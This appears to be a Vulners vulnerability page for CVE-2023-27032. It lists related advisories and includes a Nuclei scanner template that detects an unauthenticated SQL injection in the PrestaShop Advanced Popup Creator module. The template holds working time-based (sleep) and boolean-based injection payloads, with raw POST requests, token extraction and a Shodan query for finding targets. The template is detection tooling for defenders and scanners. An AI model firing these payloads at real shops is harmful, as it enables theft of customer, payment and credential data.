| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| CVE-2023-27032 | 14 Feb 202510:00 | – | circl | |
| PrestaShop SQL注入漏洞 | 12 Apr 202300:00 | – | cnnvd | |
| CVE-2023-27032 | 12 Apr 202300:00 | – | cve | |
| CVE-2023-27032 | 12 Apr 202300:00 | – | cvelist | |
| CVE-2023-27032 | 12 Apr 202314:15 | – | nvd | |
| CVE-2023-27032 | 12 Apr 202314:15 | – | osv | |
| Sql injection | 12 Apr 202314:15 | – | prion | |
| PT-2023-20908 · Prestashop · Prestashop Advancedpopupcreator | 12 Apr 202300:00 | – | ptsecurity | |
| CVE-2023-27032 | 23 May 202502:27 | – | redhatcve | |
| VulnCheck KEV: CVE-2023-27032 | 15 Feb 202600:00 | – | vulncheck_kev |
id: CVE-2023-27032
info:
name: PrestaShop AdvancedPopupCreator - SQL Injection
author: MaStErChO
severity: critical
description: |
In the module “Advanced Popup Creator” (advancedpopupcreator) from Idnovate for PrestaShop, a guest can perform SQL injection in affected versions.
impact: |
Unauthenticated attackers can execute arbitrary SQL commands to extract database contents including customer data, orders, payment information, and administrative credentials from the PrestaShop database.
remediation: |
Upgrade to the latest version of the Advanced Popup Creator module from Idnovate that addresses this SQL injection vulnerability.
reference:
- https://security.friendsofpresta.org/modules/2023/04/11/advancedpopupcreator.html
- https://addons.prestashop.com/en/pop-up/23773-popup-on-entry-exit-popup-add-product-and-newsletter.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-27032
cwe-id: CWE-89
epss-score: 0.0304
epss-percentile: 0.85917
cpe: cpe:2.3:a:idnovate:popup_module_\(on_entering\,_exit_popup\,_add_product\)_and_newsletter:*:*:*:*:*:prestashop:*:*
metadata:
verified: true
max-request: 3
vendor: idnovate
product: popup_module_\(on_entering\,_exit_popup\,_add_product\)_and_newsletter
framework: prestashop
shodan-query: http.component:"prestashop"
tags: time-based-sqli,cve,cve2023,sqli,prestashop,advancedpopupcreator,idnovate,vuln,vkev
flow: |
http(1) && (http(2) || http(3))
http:
- id: "extract_values"
raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
host-redirects: true
max-redirects: 5
extractors:
- type: regex
name: time
group: 1
regex:
- '"time":([0-9]+),'
internal: true
- type: regex
name: token
group: 1
regex:
- '"static_token":"([0-9a-z]+)",'
internal: true
- id: "time_based"
raw:
- |
@timeout 20s
POST /module/advancedpopupcreator/popup HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
availablePopups=if(now()=sysdate()%2Csleep(6)%2C0)&event=1&fromController=product&getPopup=1&id_category=0&id_manufacturer=0&id_product=1&id_supplier=0&referrer=&responsiveWidth=1280&time={{time}}&token={{token}}
- |
@timeout 20s
POST /module/advancedpopupcreator/popup HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
fromController=(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'"%2B(select(0)from(select(sleep(6)))v)%2B"*/&id_category=0&id_cms=1&id_manufacturer=0&id_product=0&id_supplier=0&referrer=1&responsiveWidth=1280&time={{time}}&token={{token}}&updateVisits=1&url=https%253A%252F%252F{{Hostname}}%252F
stop-at-first-match: true
matchers:
- type: dsl
name: time-based
dsl:
- status_code == 200
- contains(content_type, "text/html")
- contains_all(body,'hasError')
- duration >= 6
condition: and
- id: "blind_based"
raw:
- |
POST /module/advancedpopupcreator/popup HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
availablePopups=-8514)%20OR%206158%3d6158--%20eKWg&event=1&fromController=product&getPopup=1&id_category=0&id_manufacturer=0&id_product=1&id_supplier=0&referrer=&responsiveWidth=1280&time={{time}}&token={{token}}
- |
POST /module/advancedpopupcreator/popup HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
availablePopups=-8514)%20OR%206158%3d6157--%20eKWg&event=1&fromController=product&getPopup=1&id_category=0&id_manufacturer=0&id_product=1&id_supplier=0&referrer=&responsiveWidth=1280&time={{time}}&token={{token}}
matchers:
- type: dsl
name: blind-based
dsl:
- 'status_code == 200'
- 'contains(tolower(response_1), "selector")'
- '!contains(tolower(response_2), "selector")'
condition: and
# digest: 4b0a00483046022100ba85a5139332f7ea2e8aeadf84cd034175686d733b31185700c677c43454e4bb0221008f8db9863ee971fe6b8c37e4f5ca823a42c669d32c698533c9c0f2f7b7763c52:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation